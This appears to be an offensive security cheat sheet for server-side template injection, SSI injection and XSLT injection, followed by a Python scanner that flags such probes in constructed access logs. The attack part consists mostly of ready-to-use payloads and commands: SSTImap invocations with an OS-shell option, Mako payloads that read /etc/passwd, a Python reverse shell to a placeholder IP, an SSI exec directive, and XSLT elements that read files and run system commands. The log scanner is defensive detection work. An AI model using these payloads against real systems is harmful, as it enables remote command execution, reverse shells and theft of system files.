SSTI

Resources

Detection

Insert this polyglot into the suspected field and check whether the response turns into an error:

${{<%[%'"}}%\.

SSTImap

Setup

git clone https://github.com/vladko312/SSTImap.git; cd SSTImap; pip3 install -r requirements.txt

Usage

Detect

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx

Run system commands

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx -e Mako -S id

OS Shell

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx -e Mako --os-shell

Engine-specific

Mako

${4+4}
<%import os;x=os.popen('cat /etc/passwd').read()%>${x}
<%from pathlib import Path;x=Path('/etc/passwd').read_text()%>${x}
<%import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1236));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);%>

SSI Injection

Common file extensions

.shtml
.shtm
.stm

Useful directives

<!--#exec cmd="whoami" -->
<!--#include virtual="some-source.js" -->

XSLT Injection

Detection

Test the < character, since XSL elements are injected directly into the XML document.

Useful elements

<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
<xsl:value-of select="php:function('system','id')" />
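A server-side counterpart to the Detection step at the top and to the SSI and XSLT sections, added here as an example that is not part of the original page or of SSTImap: it URL-decodes request targets from constructed access-log lines, tags the three injection classes covered on this page, and flags a polyglot probe that produced a 5xx (the "check if there's an error" signal as the defender sees it). Log format, IP addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original page), combined-log shape.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?fieldUsedInTemplate=alice HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?fieldUsedInTemplate=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C. HTTP/1.1" 500 0
10.0.0.7 - - [10/Oct/2023:13:55:52 +0000] "GET /index.php?fieldUsedInTemplate=%24%7B4%2B4%7D HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /page.shtml?msg=%3C%21--%23exec+cmd%3D%22whoami%22+--%3E HTTP/1.1" 200 300
10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /transform?xsl=%3Cxsl%3Avalue-of+select%3D%22php%3Afunction(%27system%27%2C%27id%27)%22%2F%3E HTTP/1.1" 200 900
"""

# The detection polyglot from the page, compared literally after URL-decoding.
POLYGLOT = '${{<%[%\'"}}%\\.'

# One signature per injection class covered on this page.
SIGNATURES = [
    ("template-expression", re.compile(r"\$\{[^}]*\}|<%.*?%>", re.S)),  # Mako ${...} / <% ... %>
    ("ssi-directive", re.compile(r"<!--#\s*(exec|include)\b", re.I)),    # SSI exec / include
    ("xslt-injection", re.compile(r"<xsl:|php:function", re.I)),         # XSL element / PHP bridge
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" (?P<status>\d{3})')


def classify(decoded):
    """Return signature names matching an already URL-decoded request target."""
    tags = ["ssti-polyglot"] if POLYGLOT in decoded else []
    return tags + [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """One finding per suspicious line. error_on_probe is the server-side view of the
    'insert this and check if there's an error' step: the polyglot followed by a 5xx."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(unquote_plus(m.group("target")))
        if tags:
            status = int(m.group("status"))
            findings.append({"ip": m.group("ip"), "status": status, "tags": tags,
                             "error_on_probe": "ssti-polyglot" in tags and status >= 500})
    return findings
```

The benign first request produces no finding; the polyglot request is the only one whose 500 marks the template engine as having actually choked on the probe, which is the line worth alerting on.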